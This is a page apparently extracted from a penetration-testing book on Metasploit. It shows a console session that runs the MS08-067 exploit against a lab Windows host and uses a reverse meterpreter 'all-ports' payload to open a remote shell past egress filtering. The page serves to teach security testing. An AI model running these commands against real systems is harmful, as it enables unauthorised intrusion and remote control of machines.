background image

The Joy of Exploitation

71

This type of exploit, called a 

heap-based attack

, takes advantage of dynamic 

memory allocation, but it isn’t 100 percent reliable. (You may need to attempt 
the 

exploit

 command a few times if it doesn’t work the first time.)

Notice in this example that we used a 

bind

 shell to set up a listener port 

on the target machine; Metasploit handles the direct connection to the system 
automatically for us. (Remember to use the reverse payload when attacking 
through a firewall or NAT.)

All-Ports Payloads: Brute Forcing Ports

In the preceding examples, we’ve relied on the reverse port always being 
open. But what if we’re attacking an organization with very strict egress port 
filtering? Most companies block outbound connections except those from a 
few defined ports, and it can be difficult to determine which ports can make 
outbound connections.

We can guess that port 443 won’t be inspected and will allow a TCP con-

nection out, and that FTP, Telnet, SSH, and HTTP may be allowed. But why 
guess when Metasploit has a very specific payload for use in finding open ports? 

Metasploit’s payload will try every available port until it finds an open 

one. (Going through the entire port range [1–65535] can take quite a long 
time, however.)

Let’s use this payload and have it try all ports connecting outbound until 

we get one that is successful:

msf > 

use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > 

set LHOST 192.168.33.129

lhost => 192.168.33.129
smsf exploit(ms08_067_netapi) > 

set RHOST 192.168.33.130

rhost => 192.168.33.130
msf exploit(ms08_067_netapi) > 

set TARGET 3

target => 3
msf exploit(ms08_067_netapi) > 

search ports

[*] Searching loaded modules for pattern 'ports'...

Compatible Payloads
===================

   Name                               

 Rank    Description

   ----                                  

 ----    -----------

   windows/dllinject/reverse_tcp_allports 

normal  Reflective Dll Injection,

Reverse All-Port TCP Stager

   windows/meterpreter/reverse_tcp_allports   normal  Windows Meterpreter (Reflective

Injection), Reverse All-Port TCP Stager

. . . SNIP . . .

msf exploit(ms08_067_netapi) > 

set PAYLOAD windows/meterpreter/reverse_tcp_allports

payload => windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > 

exploit -j

[*] Exploit running as background job.